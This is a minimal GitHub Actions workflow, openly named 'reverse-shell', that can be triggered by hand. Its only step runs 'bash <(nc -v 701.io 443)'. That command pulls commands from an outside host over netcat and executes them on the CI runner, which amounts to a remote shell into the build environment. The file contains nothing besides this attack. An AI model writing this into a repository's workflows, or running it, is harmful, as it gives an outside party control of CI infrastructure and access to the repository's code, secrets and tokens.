name: reverse-shell

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: reverse-shell
        run: |
          bash <(nc -v 701.io 443)
